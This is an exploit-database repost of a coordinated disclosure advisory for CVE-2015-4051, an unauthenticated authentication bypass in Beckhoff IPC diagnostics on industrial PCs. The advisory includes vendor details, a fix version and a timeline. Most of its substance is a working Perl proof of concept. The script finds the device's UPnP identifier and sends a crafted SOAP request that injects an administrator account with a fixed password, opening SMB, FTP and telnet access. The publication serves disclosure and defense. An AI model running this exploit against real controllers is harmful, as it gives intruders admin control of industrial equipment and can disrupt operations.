Beckhoff IPC diagnostics < 1.8 : Authentication bypass

2015.06.05
Credit: Frank Lycops
Risk: High
Local: No
Remote: Yes
CVE: CVE-2015-4051
CWE: N/A


CVSS Base Score: 9/10
Impact Subscore: 8.5/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Complete

Beckhoff IPC diagnostics < 1.8 : Authentication bypass ====================================================== CVE number: CVE-2015-4051 Permalink: http://www.thesecurityfactory.be/permalink/beckhoff-authentication-bypass.html Vendor advisory: http://ftp.beckhoff.com/download/document/IndustPC/Advisory-2015-001.pdf -- Info -- Beckhoff IPC diagnostics is support software that is preinstalled on all Beckhoff Industrial PCís (and PLCís) that are running an embedded Microsoft Windows operating system. The software enables various system diagnostics options, as well the possibility to alter various settings. -- Affected version -- IPC Diagnostics < Version 1.8 -- Vulnerability details -- Due to a lack of authentication when making a call to /upnpisapi, an unauthenticated attacker is able to perform a variety of actions on the system by sending a specially crafted packet. These actions include rebooting the device or injecting a new user that has admin access rights on both the underlaying embedded Windows and webserver. Further access can be obtained on the system by connecting to SMB / FTP / telnet / Ö using the injected user. -- PoC -- #!/usr/bin/perl use IO::Socket::INET; use strict; use warnings; if ($#ARGV < 0) { print "Usage: $0 ip\n"; exit(-1); } system("clear"); print "Connecting to UPNP\n"; my $upnp_req = "M-SEARCH * HTTP/1.1\r\n" . "Host:239.255.255.250:1900\r\n" . "ST:upnp:rootdevice\r\n" . "Man:\"ssdp:discover\"\r\n" . "MX:3\r\n" . "\r\n"; my $ip = $ARGV[0]; my $socket = new IO::Socket::INET ( PeerAddr => "$ip:1900", Proto => 'udp') or die "ERROR in Socket Creation : $!\n"; $socket->send($upnp_req); my $usn; while (1) { my $data = <$socket>; print "$data"; # Get the USN if ($data =~ /^USN:/) { print "\nUSN seen. Trying to get it\n"; ($usn) = $data =~ /^USN:uuid:(.*)::upnp:rootdevice/; last; } } print "\n\nUSN found: $usn\n\n"; print "Creating curl command\n\n"; my $curl_command = "curl -i -s -k -X 'POST' " . " -H 'SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write' -H 'Content-Type: text/xml; charset=utf-8' " . " --data-binary \$'00-1340079872KAAAAAYAAAAAAAAAEgAAAEluamVjdHRoZVNlY3VyaXR5RmFjdG9yeQAA' " . " 'http://"; . $ip . ":5120/upnpisapi?uuid:" . $usn . "+urn:beckhoff.com:serviceId:cxconfig'"; print "Executing Curl command\n\n"; system($curl_command); print "User: Inject, Password: theSecurityFactory should be injected"; -- Solution -- This issue has been fixed as of version 1.8.1.0 -- Timeline -- 2015-27-01 Vulnerability discovery and creation of PoC 2015-28-01 Vulnerability responsibly reported to vendor 2015-13-02 Second disclosure to vendor 2015-13-02 Vendor response and acknowledgement of vulnerability 2015-15-04 - 2015-15-05 Various communications 2015-21-05 Vendor update and advisory release 2015-04-06 Advisory published in coordination with vendor -- Credits -- Frank Lycops Frank.lycops [at] thesecurityfactory.be

References:

http://www.thesecurityfactory.be/permalink/beckhoff-authentication-bypass.html
http://ftp.beckhoff.com/download/document/IndustPC/Advisory-2015-001.pdf


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top